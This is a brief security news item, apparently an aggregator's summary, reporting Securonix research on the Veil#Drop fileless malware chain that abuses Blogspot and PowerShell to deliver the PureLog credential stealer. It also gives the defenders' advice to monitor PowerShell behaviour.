www.infosecurity-magazine.com 7/1/2026, 2:41:18 PM · external

Veil#Drop fileless malware uses Blogspot to drop PureLog Stealer

Veil#Drop fileless malware uses Blogspot to drop PureLog Stealer

A fileless malware framework, dubbed Veil#Drop, has exploited Google's Blogspot to deploy the PureLog Stealer entirely in memory, enabling attackers to steal credentials without leaving conventional traces on disk. According to Securonix Threat Research, the attack involves a sequence of compromised websites alongside a malicious JavaScript file that activates PowerShell to fetch further instructions directly from Blogspot.

This approach circumvents traditional detection methods by blending malicious traffic with legitimate web activity. The PureLog Stealer targets a wide range of sensitive data, such as browser passwords and session cookies, posing significant security risks, including bypassing multi-factor authentication. Securonix advised defenders to monitor for suspicious PowerShell behavior rather than relying solely on static indicators of compromise.

View full article

Article by CyberSIXT